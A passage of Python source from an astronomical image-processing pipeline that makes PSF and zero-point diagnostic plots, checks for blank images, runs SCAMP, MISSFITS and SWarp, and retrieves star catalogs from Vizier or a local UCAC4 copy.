Ellipticity', alpha=1.0)\n pyplot.plot([self.ellipticity_average, self.ellipticity_average], [0, 1.1*max(ellip_hist)],\\\n 'bo-', linewidth=2, label='Average Ellipticity', alpha=0.3)\n pyplot.xlabel('Ellipticity', size=10)\n pyplot.ylabel('N Stars', size=10)\n pyplot.xlim(0,1)\n pyplot.xticks(0.1*np.arange(11), size=10)\n pyplot.yticks(size=10)\n\n MiddleLeft = pyplot.axes([0.000, 0.375, 0.465, 0.320])\n MiddleLeft.set_aspect('equal')\n pyplot.title('Average FWHM scaled from {:.1f} pix to {:.1f} pix'.format(\\\n 0.8*self.FWHM.to(u.pix).value,\\\n 2.0*self.FWHM.to(u.pix).value), size=10)\n if self.n_stars_SExtracted > 20000:\n gridsize = 20\n else:\n gridsize = 10\n pyplot.hexbin(self.SExtractor_results['XWIN_IMAGE'].data,\\\n self.SExtractor_results['YWIN_IMAGE'].data,\\\n self.SExtractor_results['FWHM_IMAGE'].data,\\\n gridsize=gridsize,\\\n mincnt=5,\\\n vmin=0.8*self.FWHM.to(u.pix).value,\\\n vmax=2.0*self.FWHM.to(u.pix).value,\\\n alpha=0.5,\\\n cmap='Reds')\n # center_region = pyplot.Circle((self.nXPix/2, self.nYPix/2),\\\n # radius=self.tel.PSF_measurement_radius/self.nXPix,\\\n # color='k')\n # MiddleLeft.add_artist(center_region)\n pyplot.xlabel('X Pixels', size=10)\n pyplot.ylabel('Y Pixels', size=10)\n pyplot.xlim(0,self.nXPix)\n pyplot.ylim(0,self.nYPix)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n MiddleRight = pyplot.axes([0.535, 0.375, 0.465, 0.320])\n MiddleRight.set_aspect('equal')\n pyplot.title('Average Ellipticity scaled from 0.25 to 0.75', size=10)\n if self.n_stars_SExtracted > 20000:\n gridsize = 20\n else:\n gridsize = 10\n pyplot.hexbin(self.SExtractor_results['XWIN_IMAGE'].data,\\\n self.SExtractor_results['YWIN_IMAGE'].data,\\\n self.SExtractor_results['ELLIPTICITY'].data,\\\n gridsize=gridsize,\\\n mincnt=5,\\\n vmin=0.25, vmax=0.75,\\\n alpha=0.5,\\\n cmap='Reds')\n # MiddleRight.add_artist(center_region)\n pyplot.xlabel('X Pixels', size=10)\n pyplot.ylabel('Y Pixels', size=10)\n pyplot.xlim(0,self.nXPix)\n pyplot.ylim(0,self.nYPix)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n BottomLeft = pyplot.axes([0.000, 0.0, 0.465, 0.320])\n pyplot.title('Correlation of Ellipticity with Image Radius', size=10)\n if self.n_stars_SExtracted > 4000:\n bins = 40\n elif 
self.n_stars_SExtracted > 2000:\n bins = 30\n else:\n bins = 20\n pyplot.hist2d(self.SExtractor_results['ImageRadius'],\\\n self.SExtractor_results['ELLIPTICITY'],\\\n bins=bins, cmap='binary')\n pyplot.xlabel('r (pixels)', size=10)\n pyplot.ylabel('Ellipticity', size=10)\n pyplot.xlim(0, math.sqrt(self.nXPix**2 + self.nYPix**2)/2.)\n pyplot.ylim(0, 1.0)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n BottomRight = pyplot.axes([0.535, 0.0, 0.465, 0.320])\n BottomRight.set_aspect('equal')\n pyplot.title('Correlation Between PSF Angle and Position in Image', size=10)\n pyplot.hist2d(star_angles, image_angles, bins=bins, cmap='binary')\n pyplot.xlabel('Stellar PSF PA', size=10)\n pyplot.ylabel('Image PA', size=10)\n pyplot.xlim(-100,100)\n pyplot.xticks(30*(np.arange(7)-3), size=10)\n pyplot.ylim(-100,100)\n pyplot.yticks(30*(np.arange(7)-3), size=10)\n\n pyplot.savefig(self.PSF_plot_file, dpi=100,\\\n bbox_inches='tight', pad_inches=0.10)\n pyplot.close(fig)\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done making PSF plot in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n ##-------------------------------------------------------------------------\n ## Is the Image Blank\n ##-------------------------------------------------------------------------\n def is_blank(self, threshold=None, area=None):\n '''\n '''\n self.logger.info('Checking if image is blank')\n nstars_threshold = 5\n\n ## Save original SExtractor parameters\n if 'DETECT_THRESH' in self.tel.SExtractor_params.keys():\n dt = self.tel.SExtractor_params['DETECT_THRESH']\n else:\n dt = None\n if 'ANALYSIS_THRESH' in self.tel.SExtractor_params.keys():\n at = self.tel.SExtractor_params['ANALYSIS_THRESH']\n else:\n at = None\n if 'DETECT_MINAREA' in self.tel.SExtractor_params.keys():\n da = self.tel.SExtractor_params['DETECT_MINAREA']\n else:\n da = None\n ## Set new (temporary) parmaters\n if threshold:\n self.tel.SExtractor_params['DETECT_THRESH'] = threshold\n self.tel.SExtractor_params['ANALYSIS_THRESH'] = threshold\n if area:\n self.tel.SExtractor_params['DETECT_MINAREA'] = area\n \n ## Run SExtractor\n self.run_SExtractor()\n stars = [entry for entry in self.SExtractor_results if entry['FLAGS'] == 0]\n# filtered_stars = [star for star in stars if star['BWIN_IMAGE'] > 1.0]\n\n ## Edit SExtractor parameters back to original state\n if dt:\n self.tel.SExtractor_params['DETECT_THRESH'] = dt\n else:\n if 'DETECT_THRESH' in self.tel.SExtractor_params:\n del self.tel.SExtractor_params['DETECT_THRESH']\n if at:\n self.tel.SExtractor_params['ANALYSIS_THRESH'] = at\n else:\n if 'ANALYSIS_THRESH' in self.tel.SExtractor_params:\n del self.tel.SExtractor_params['ANALYSIS_THRESH']\n if da:\n self.tel.SExtractor_params['DETECT_MINAREA'] = da\n else:\n if 'DETECT_MINAREA' in self.tel.SExtractor_params:\n del self.tel.SExtractor_params['DETECT_MINAREA']\n\n ## Reset all SExtractor results to None, so we don't confuse these\n ## results with meaningful ones\n self.SExtractor_catalogfile = None\n self.SExtractor_results = None\n self.n_stars_SExtracted = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n\n ## If few stars found, the image is blank\n if len(stars) < nstars_threshold:\n self.logger.warning(' Only {} bright stars detected. 
Image appears blank'.format(\\\n len(stars)))\n self.flags['blank'] = True\n return True\n else:\n self.logger.info(' Found {} bright stars.'.format(len(stars)))\n self.flags['blank'] = False\n return False\n\n\n ##-------------------------------------------------------------------------\n ## Run SCAMP\n ##-------------------------------------------------------------------------\n def run_SCAMP(self, params=None, timeout=90):\n '''\n Run SCAMP on SExtractor output catalog.\n '''\n if not self.image_WCS:\n self.logger.warning('No image WCS found. Skipping SCAMP.')\n self.SCAMP_successful = False\n return self.SCAMP_successful\n start_time = datetime.datetime.now()\n ## Change to tmp directory\n origWD = os.getcwd()\n os.chdir(self.tel.temp_file_path)\n\n head_filename = '{}.head'.format(self.raw_file_basename)\n head_file = os.path.join(self.tel.temp_file_path, head_filename)\n if os.path.exists(head_file):\n os.remove(head_file)\n\n ## Parameters for SCAMP\n SCAMP_default = {\n 'SAVE_REFCATALOG': 'N',\n 'REFOUT_CATPATH': self.tel.temp_file_path,\n 'MERGEDOUTCAT_NAME': os.path.join(self.tel.temp_file_path, 'scamp.cat'),\n 'MERGEDOUTCAT_TYPE': 'FITS_LDAC',\n 'CHECKPLOT_RES': '1200,1200',\n 'CHECKPLOT_TYPE': 'NONE',\n 'SOLVE_PHOTOM': 'Y',\n 'ASTRINSTRU_KEY': 'QRUNID',\n 'WRITE_XML': 'N',\n 'XML_NAME': os.path.join(self.tel.temp_file_path, 'scamp.xml'),\n }\n\n SCAMP_params = SCAMP_default\n if self.tel.SCAMP_params:\n for key in self.tel.SCAMP_params.keys():\n SCAMP_params[key] = self.tel.SCAMP_params[key]\n if params:\n for key in params.keys():\n SCAMP_params[key] = params[key]\n\n SCAMPCommand = [\"scamp\", self.SExtractor_catalogfile]\n for key in SCAMP_params.keys():\n SCAMPCommand.append('-{}'.format(key))\n SCAMPCommand.append('{}'.format(SCAMP_params[key]))\n self.logger.info(\"Running SCAMP\")\n self.logger.debug(\" SCAMP command: {}\".format(' '.join(SCAMPCommand)))\n try:\n SCAMP_STDOUT = subprocess.check_output(SCAMPCommand, timeout=timeout,\\\n stderr=subprocess.STDOUT, universal_newlines=True)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('SCAMP timed out')\n except OSError as e:\n if e.errno == 2:\n self.logger.error('Could not find SCAMP executable. Is SCAMP installed?')\n self.logger.error(\"SCAMP failed. ErrNo: {}\".format(e.errno))\n self.logger.error(\"SCAMP failed. StrErr: {}\".format(e.strerror))\n except subprocess.CalledProcessError as e:\n self.logger.error(\"SCAMP failed. Command: {}\".format(e.cmd))\n self.logger.error(\"SCAMP failed. Returncode: {}\".format(e.returncode))\n self.logger.error(\"SCAMP failed. 
Output: {}\".format(e.output))\n except:\n self.logger.error(\"SCAMP process failed: {0}\".format(sys.exc_info()[0]))\n self.logger.error(\"SCAMP process failed: {0}\".format(sys.exc_info()[1]))\n self.logger.error(\"SCAMP process failed: {0}\".format(sys.exc_info()[2]))\n else:\n StartAstrometricStats = False\n EndAstrometricStats = False\n for line in SCAMP_STDOUT.splitlines():\n MatchVersion = re.search('SCAMP (\\d+\\.\\d+\\.\\d+) started on', line)\n if MatchVersion:\n self.logger.debug(' SCAMP version = {}'.format(MatchVersion.group(1)))\n if re.search('Astrometric stats \\(external\\)', line):\n StartAstrometricStats = True\n if re.search('Generating astrometric plots', line):\n EndAstrometricStats = True\n if StartAstrometricStats and not EndAstrometricStats:\n self.logger.debug(\" SCAMP Output: \"+line)\n else:\n self.logger.debug(\" SCAMP Output: \"+line)\n\n ## Populate FITS header with SCAMP derived header values in .head file\n if os.path.exists(head_file):\n self.temp_files.append(head_file)\n try:\n self.logger.info(' Writing SCAMP results to fits header on {}'.format(\\\n self.working_file))\n missfits_cmd = 'missfits -SAVE_TYPE REPLACE -WRITE_XML N {}'.format(\\\n self.working_file)\n self.logger.debug(' Running: {}'.format(missfits_cmd))\n output = subprocess.check_output(missfits_cmd, shell=True, timeout=timeout,\\\n stderr=subprocess.STDOUT, universal_newlines=True)\n output = str(output)\n for line in output.splitlines():\n self.logger.debug(line)\n except:\n self.logger.warning('Could not run MISSFITS to write SCAMP results to header')\n self.SCAMP_successful = True\n else:\n self.logger.critical('No .head file found from SCAMP. SCAMP failed.')\n self.SCAMP_successful = False\n\n os.chdir(origWD)\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done running SCAMP in {:.1f} s'.format(\n elapsed_time.total_seconds()))\n return self.SCAMP_successful\n\n\n ##-------------------------------------------------------------------------\n ## Run SWarp\n ##-------------------------------------------------------------------------\n '''\n Run SWarp on the image (after SCAMP distortion solution) to de-distort it.\n '''\n def run_SWarp(self, timeout=30):\n start_time = datetime.datetime.now()\n ## Parameters for SWarp\n swarp_file = os.path.join(self.tel.temp_file_path, 'swarpped.fits')\n if os.path.exists(swarp_file): os.remove(swarp_file)\n SWarp_params = {'IMAGEOUT_NAME': swarp_file,\n 'COPY_KEYWORDS': 'FILTER,OBJECT,AIRMASS,DATE-OBS,LAT-OBS,LONG-OBS,ALT-OBS,RA,DEC',\n 'WRITE_XML': 'N',\n 'XML_NAME': os.path.join(self.tel.temp_file_path, 'swarp.xml'),\n 'FSCALASTRO_TYPE': 'NONE',\n 'SUBTRACT_BACK': 'N',\n }\n SWarpCommand = [\"swarp\", self.working_file]\n for key in SWarp_params.keys():\n SWarpCommand.append('-{}'.format(key))\n SWarpCommand.append('{}'.format(SWarp_params[key]))\n self.logger.info(\"Running SWarp.\")\n self.logger.debug(\" SWarp command: {}\".format(' '.join(SWarpCommand)))\n try:\n SWarp_STDOUT = subprocess.check_output(SWarpCommand, timeout=timeout,\\\n stderr=subprocess.STDOUT,\\\n universal_newlines=True)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('SWARP timed out')\n except subprocess.CalledProcessError as e:\n self.logger.error(\"SWarp failed. Command: {}\".format(e.cmd))\n self.logger.error(\"SWarp failed. Returncode: {}\".format(e.returncode))\n self.logger.error(\"SWarp failed. 
Output: {}\".format(e.output))\n except:\n self.logger.error(\"SWarp process failed: {0}\".format(sys.exc_info()[0]))\n self.logger.error(\"SWarp process failed: {0}\".format(sys.exc_info()[1]))\n self.logger.error(\"SWarp process failed: {0}\".format(sys.exc_info()[2]))\n else:\n for line in SWarp_STDOUT.splitlines():\n MatchVersion = re.search('SWarp (\\d+\\.\\d+\\.\\d+) started on', line)\n if MatchVersion:\n self.logger.debug(' SWarp version = {}'.format(MatchVersion.group(1)))\n if not re.search('Resampling line', line) and\\\n not re.search('Setting up background map at', line):\n self.logger.debug(\" SWarp Output: \"+line)\n ## Replace working_file with SWarp output file\n if os.path.exists(swarp_file):\n self.logger.debug(' SWarp process succeeded.')\n self.logger.debug(' Moving SWarpped file to working file.')\n if os.path.exists(self.working_file): os.remove(self.working_file)\n os.rename(swarp_file, self.working_file)\n assert os.path.exists(self.working_file)\n self.read_header()\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done running SWarp in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Get Vizier Catalog\n ##-------------------------------------------------------------------------\n def get_catalog(self, max_stars=50000):\n '''\n Get a catalog using astroquery\n '''\n start_time = datetime.datetime.now()\n if self.image_WCS:\n import astroquery\n import astroquery.vizier\n catalog = self.tel.catalog_info['name']\n self.logger.info(\"Querying Vizier for {} catalog.\".format(catalog))\n\n if 'columns' in self.tel.catalog_info.keys():\n columns = self.tel.catalog_info['columns']\n else:\n if catalog == 'UCAC4': columns = ['_RAJ2000', '_DEJ2000',\\\n 'UCAC4', 'Bmag', 'Vmag',\\\n 'gmag', 'rmag', 'imag']\n else: columns = []\n self.logger.debug(' Getting columns: {}'.format(columns))\n\n if self.filter in self.tel.catalog_info.keys():\n catfilt = str(self.tel.catalog_info[self.filter])\n else:\n catfilt = 'R'\n if 'magmax' in self.tel.catalog_info:\n upperlimit = '<{:.1f}'.format(self.tel.catalog_info['magmax'])\n column_filters = {catfilt:upperlimit}\n self.logger.debug(' Using column_filters: {}'.format(column_filters))\n\n viz = astroquery.vizier.Vizier(catalog=catalog,\\\n columns=columns,\\\n column_filters=column_filters)\n viz.ROW_LIMIT = max_stars\n\n center_from_WCS = self.image_WCS.wcs_pix2world(\\\n [[self.nXPix/2, self.nYPix/2]], 1)\n self.coordinate_of_center_pixel = coords.SkyCoord(\\\n ra=center_from_WCS[0][0],\\\n dec=center_from_WCS[0][1],\\\n unit=(u.degree, u.degree),\\\n frame='icrs')\n footprint = self.image_WCS.calc_footprint()\n RAs = [val[0] for val in footprint]\n DECs = [val[1] for val in footprint]\n dRA = (max(RAs) - min(RAs))\n if dRA > 180:\n dRA = (min(RAs)+360. 
- max(RAs))\n dDEC = (max(DECs) - min(DECs))\n self.logger.debug(\" Center Coordinate: {}\".format(\\\n self.coordinate_of_center_pixel.to_string(\\\n style='hmsdms', precision=1)))\n\n vizier_data = viz.query_region(coordinates=self.coordinate_of_center_pixel,\\\n width=dRA*u.deg, height=dDEC*u.deg,\\\n catalog=catalog)\n n_stars = len(vizier_data[0])\n self.logger.info(\" Retrieved {} lines from {} catalog.\".format(n_stars, catalog))\n self.catalog_name = catalog\n self.catalog_data = vizier_data[0]\n\n ## Standardize Column Names\n if catalog == 'USNO-B1.0':\n self.catalog_data.rename_column('USNO-B1.0', 'ID')\n self.catalog_data.rename_column('_RAJ2000', 'RA')\n self.catalog_data.rename_column('_DEJ2000', 'Dec')\n if catalog == 'UCAC4':\n self.catalog_data.rename_column('UCAC4', 'ID')\n self.catalog_data.rename_column('_RAJ2000', 'RA')\n self.catalog_data.rename_column('_DEJ2000', 'Dec')\n else:\n self.logger.info(\"No image WCS, so catalog query skipped\")\n self.catalog_name = None\n self.catalog_data = None\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done retrieving Vizier catalog in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Get UCAC4 Catalog for Image from Local File\n ##-------------------------------------------------------------------------\n def get_local_UCAC4(self, timeout=30,\\\n local_UCAC_command=\"/Volumes/Data/UCAC4/access/u4test\",\\\n local_UCAC_data=\"/Volumes/Data/UCAC4/u4b\"):\n '''\n Get a list of stars which are in the image from a local UCAC catalog.\n '''\n start_time = datetime.datetime.now()\n assert type(self.coordinate_of_center_pixel) == coords.SkyCoord\n\n if not os.path.exists(local_UCAC_command):\n self.logger.warning('Cannot find local UCAC command: {}'.format(\\\n local_UCAC_command))\n elif not os.path.exists(local_UCAC_data):\n self.logger.warning('Cannot find local UCAC data: {}'.format(local_UCAC_data))\n else:\n center_from_WCS = self.image_WCS.wcs_pix2world([[self.nXPix/2, self.nYPix/2]], 1)\n footprint = self.image_WCS.calc_footprint()\n RAs = [val[0] for val in footprint]\n DECs = [val[1] for val in footprint]\n dRA = (max(RAs) - min(RAs))\n if dRA > 180:\n dRA = (min(RAs)+360. - max(RAs))\n dDEC = (max(DECs) - min(DECs))\n self.logger.info(\"Getting stars from local UCAC4 catalog.\")\n UCACcommand = [local_UCAC_command,\\\n \"{:.4f}\".format(self.coordinate_of_center_pixel.ra.degree),\\\n \"{:.4f}\".format(self.coordinate_of_center_pixel.dec.degree),\\\n \"{:.2f}\".format(dRA),\\\n \"{:.2f}\".format(dDEC),\\\n local_UCAC_data]\n self.logger.debug(\" Using command: {}\".format(' '.join(UCACcommand)))\n if os.path.exists(\"ucac4.txt\"): os.remove(\"ucac4.txt\")\n result = subprocess.call(UCACcommand, timeout=timeout)\n if os.path.exists('ucac4.txt'):\n catalog_file_path = os.path.join(self.tel.temp_file_path,\\\n 'ucac4.txt')\n shutil.move('ucac4.txt', catalog_file_path)\n self.temp_files.append(catalog_file_path)\n else:\n self.logger.warning(' No ucac4.txt output file found. Trying again.')\n result = subprocess.call(UCACcommand, timeout=timeout)\n if os.path.exists('ucac4.txt'):\n catalog_file_path = os.path.join(self.tel.temp_file_path,\\\n 'ucac4.txt')\n shutil.move('ucac4.txt', catalog_file_path)\n self.temp_files.append(catalog_file_path)\n else:\n self.logger.warning(' No ucac4.txt output file found. 
Trying again.')\n return False\n\n ## Read in UCAC catalog\n colnames = ('id', 'RA', 'Dec', 'mag1', 'mag2', 'smag', 'ot', 'dsf',\\\n 'RAepoch', 'Decepoch', 'dRA', 'dde', 'nt', 'nu', 'nc',\\\n 'pmRA', 'pmDec', 'sRA', 'sDec', '2mass', 'j', 'h', 'k',\\\n 'e2mphos', 'icq_flag', 'B', 'V', 'g', 'r', 'i')\n colstarts = (0, 10, 24, 36, 43, 50, 54, 57, 60, 68, 76, 80, 84, 87,\\\n 90, 93, 100, 107, 111, 115, 126, 133, 140, 147, 159,\\\n 168, 175, 182, 189, 196)\n colends = (9, 22, 35, 42, 49, 53, 56, 59, 67, 75, 79, 83, 86, 89,\\\n 92, 99, 106, 110, 114, 125, 132, 139, 146, 158, 167,\\\n 174, 181, 188, 195, 202)\n self.catalog_name = 'UCAC4'\n self.catalog_data = ascii.read(catalog_file_path,\\\n Reader=ascii.FixedWidthNoHeader,\\\n data_start=1, guess=False,\\\n names=colnames,\\\n col_starts=colstarts,\\\n col_ends=colends,\\\n )\n ## Standardize Column Names\n self.catalog_data.remove_columns(['smag', 'ot', 'dsf',\\\n 'mag1', 'mag2', 'dRA', 'dde',\\\n 'nt', 'nu', 'nc',\\\n 'pmRA', 'pmDec', 'sRA', 'sDec',\\\n '2mass', 'RAepoch', 'Decepoch',\\\n 'e2mphos', 'icq_flag'])\n self.catalog_data.rename_column('id', 'ID')\n self.catalog_data.rename_column('B', 'Bmag')\n self.catalog_data.rename_column('V', 'Vmag')\n self.catalog_data.rename_column('g', 'gmag')\n self.catalog_data.rename_column('r', 'rmag')\n self.catalog_data.rename_column('i', 'imag')\n\n ## Filter catalog for magnitude limits\n faint_stars_to_remove = []\n for i in range(0,len(self.catalog_data)):\n entry = self.catalog_data[i]\n if entry[self.tel.catalog_info[self.filter]] > self.tel.catalog_info['magmax']:\n faint_stars_to_remove.append(i)\n if len(faint_stars_to_remove) > 0:\n self.logger.info(' Removing {} faint stars ({} > {}) from catalog.'.format(\\\n len(faint_stars_to_remove),\\\n self.tel.catalog_info[self.filter],\\\n self.tel.catalog_info['magmax'],\\\n ))\n self.catalog_data.remove_rows(faint_stars_to_remove)\n\n nUCACStars = len(self.catalog_data)\n self.logger.info(\" Retrieved {} stars from UCAC catalog.\".format(nUCACStars))\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done retrieving local UCAC4 catalog in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Measure Zero Point\n ##-------------------------------------------------------------------------\n def measure_zero_point(self, plot=False):\n '''\n Estimate the zero point of the image by comparing the instrumental\n magnitudes as determined by SExtractor to the catalog magnitues.\n '''\n start_time = datetime.datetime.now()\n self.logger.info('Analyzing SExtractor results to determine photometric zero point')\n\n if self.SExtractor_results\\\n and ('assoc_catmag' in self.SExtractor_results.keys())\\\n and ('MAG_AUTO' in self.SExtractor_results.keys()):\n min_stars = 10\n\n zero_points = [entry['assoc_catmag'] - entry['MAG_AUTO']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\\\n and not (float(entry['assoc_catmag']) == 0.0)]\n ## Weights assumes that uncertainty on a given measurement of the\n ## zero point is equal to 2.512/Ln(10)*1/SNR magnitudes\n ## m = 2.512 * log10(F)\n ## sig_m = dm/dF * sig_F = 2.512/ln(10) sig_F/F\n ## weight = 1/sig_m^2 = (ln(10)/2.512 * SNR)^2\n weights = [(np.log(10)/2.512*entry['FLUX_AUTO'] / entry['FLUXERR_AUTO'])**2\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not 
np.isnan(entry['assoc_catmag'])\\\n and not (float(entry['assoc_catmag']) == 0.0)]\n\n self.logger.info(' Using {} stars with {} catalog magnitude'.format(\\\n len(zero_points), self.catalog_filter))\n\n if len(zero_points) < min_stars:\n self.logger.warning(' Zero point not calculated. Only {} catalog stars found.'.format(\\\n len(zero_points)))\n else:\n self.zero_point_mode = mode(zero_points, 0.1)\n self.zero_point_median = np.median(zero_points)\n self.zero_point_average = np.average(zero_points, weights=weights)\n self.zero_point_average_uncertainty = (np.sum(weights))**-0.5\n self.logger.debug(' Mode Zero Point = {:.2f}'.format(self.zero_point_mode))\n self.logger.debug(' Median Zero Point = {:.2f}'.format(self.zero_point_median))\n self.logger.info(' Weighted Average Zero Point = {:.2f}'.format(\\\n self.zero_point_average))\n# self.zero_point_average_uncertainty))\n# self.logger.info(' Weighted Average Zero Point = {:.2f} +/- {:.2f}'.format(\\\n# self.zero_point_average,\\\n# self.zero_point_average_uncertainty))\n self.zero_point = self.zero_point_average * u.mag\n\n ## Check zero point\n if self.tel.threshold_zeropoint and self.zero_point:\n if self.zero_point < self.tel.threshold_zeropoint:\n self.flags['zero point'] = True\n else:\n self.flags['zero point'] = False\n else:\n self.flags['zero point'] = False\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done measuring zero point in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n ## Make Plot if Requested\n if plot:\n self.make_zero_point_plot()\n\n\n ##-------------------------------------------------------------------------\n ## Make Zero Point Plot\n ##-------------------------------------------------------------------------\n def make_zero_point_plot(self):\n start_time = datetime.datetime.now()\n self.logger.info('Making ZeroPoint Plot')\n import matplotlib.pyplot as pyplot\n\n self.zero_point_plotfilename = self.raw_file_basename+'_ZeroPoint.png'\n self.zero_point_plotfile = os.path.join(self.tel.plot_file_path,\\\n self.zero_point_plotfilename)\n\n catalog_mags = [entry['assoc_catmag']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n instrumental_mags = [entry['MAG_AUTO']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n zero_points = [entry['assoc_catmag'] - entry['MAG_AUTO']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n xpix = [entry['XWIN_IMAGE']\\\n for entry in self.SExtractor_results\\\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n ypix = [entry['YWIN_IMAGE']\\\n for entry in self.SExtractor_results\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n residuals = [entry['assoc_catmag'] - entry['MAG_AUTO'] - self.zero_point.value\\\n for entry in self.SExtractor_results\n if (entry['FLAGS'] == 0)\\\n and not np.isnan(entry['assoc_catmag'])\n and not (float(entry['assoc_catmag']) == 0.0)]\n\n zp_binsize = 0.1\n bmin = math.floor(min(zero_points)/zp_binsize)*zp_binsize - zp_binsize/2.\n bmax = math.ceil(max(zero_points)/zp_binsize)*zp_binsize + zp_binsize/2.\n zp_bins = 
np.arange(bmin,bmax,zp_binsize)\n zp_hist, zp_bins = np.histogram(zero_points, bins=zp_bins)\n zp_centers = (zp_bins[:-1] + zp_bins[1:]) / 2\n\n pyplot.ioff()\n fig = pyplot.figure(figsize=(10,11), dpi=100)\n\n reject_percent = 3.0\n padding = 0.5\n hist2d_binsize = 0.1\n\n ## Correlation of Instrumental Magnitude with Catalog Magnitude\n TopLeft = pyplot.axes([0.000, 0.650, 0.465, 0.335])\n TopLeft.set_aspect('equal')\n xmin = math.floor( ( (np.percentile(catalog_mags, reject_percent)-padding)*2))/2.\n xmax = math.ceil( ( (np.percentile(catalog_mags, 100.-reject_percent)+padding)*2))/2.\n ymin = math.floor( ( (np.percentile(instrumental_mags, reject_percent)-padding)*2))/2.\n ymax = math.ceil( ( (np.percentile(instrumental_mags, 100.-reject_percent)+padding)*2))/2.\n xbins = list(np.arange(xmin,xmax,hist2d_binsize))\n ybins = list(np.arange(ymin,ymax,hist2d_binsize))\n pyplot.title('Correlation of Instrumental and Catalog Magnitudes', size=10)\n pyplot.hist2d(catalog_mags, instrumental_mags, bins=[xbins, ybins], cmap='binary')\n pyplot.xlabel('{} {} Magnitude'.format(self.catalog_name, self.catalog_filter), size=10)\n pyplot.ylabel('Instrumental Magnitude', size=10)\n pyplot.xticks(np.arange(-5,25,1))\n pyplot.yticks(np.arange(-25,25,1))\n pyplot.grid()\n pyplot.ylim(ymin,ymax)\n pyplot.xlim(xmin,xmax)\n ## Overplot Line of Zero Point\n catmag = [-5,30]\n fitmag = [(val-self.zero_point.value) for val in catmag]\n pyplot.plot(catmag, fitmag, 'k-')\n\n\n ## Plot Histogram of Zero Point Values\n TopRight = pyplot.axes([0.535, 0.650, 0.465, 0.335])\n pyplot.title('Histogram of Zero Point Values for {}'.format(self.raw_file_name), size=10)\n pyplot.plot([self.zero_point_mode, self.zero_point_mode], [0, 1.1*max(zp_hist)],\\\n 'ro-', linewidth=2, label='Mode Zero Point', alpha=0.4)\n pyplot.plot([self.zero_point_median, self.zero_point_median], [0, 1.1*max(zp_hist)],\\\n 'go-', linewidth=2, label='Median Zero Point', alpha=0.4)\n pyplot.plot([self.zero_point_average, self.zero_point_average], [0, 1.1*max(zp_hist)],\\\n 'bo-', linewidth=2, label='Average Zero Point', alpha=1.0)\n pyplot.bar(zp_centers, zp_hist, align='center', width=0.7*zp_binsize)\n pyplot.xlabel('Zero Point', size=10)\n pyplot.ylabel('N Stars', size=10)\n pyplot.xlim(np.percentile(zero_points, reject_percent)-padding,\\\n np.percentile(zero_points, 100.-reject_percent)+padding)\n pyplot.yticks(size=10)\n\n ## Plot Residuals\n MiddleLeft = pyplot.axes([0.000, 0.275, 0.465, 0.320])\n xmin = math.floor( ( (np.percentile(catalog_mags, reject_percent)-padding)*4))/4.\n xmax = math.ceil( ( (np.percentile(catalog_mags, 100.-reject_percent)+padding)*4))/4.\n ymin = math.floor( ( (np.percentile(residuals, reject_percent)-padding)*4))/4.\n ymax = math.ceil( ( (np.percentile(residuals, 100.-reject_percent)+padding)*4))/4.\n xbins = list(np.arange(xmin,xmax,hist2d_binsize))\n ybins = list(np.arange(ymin,ymax,hist2d_binsize))\n pyplot.hist2d(catalog_mags, residuals, bins=[xbins, ybins], cmap='binary')\n pyplot.xlabel('{} {} Magnitude'.format(self.catalog_name, self.catalog_filter), size=10)\n pyplot.ylabel('Magnitude Residuals', size=10)\n pyplot.grid()\n pyplot.ylim(ymin,ymax)\n pyplot.xlim(xmin,xmax)\n ## Overplot Line of Zero Point\n catmag = [-5,30]\n fitmag = [0, 0]\n pyplot.plot(catmag, fitmag, 'k-')\n\n ## Plot Spatial Distribution of Residuals\n range = [-0.5, 0.5]\n MiddleRight = pyplot.axes([0.535, 0.275, 0.465, 0.320])\n MiddleRight.set_aspect('equal')\n pyplot.title('Residuals scaled from {:+.1f} to {:+.1f}'.format(\\\n range[0], 
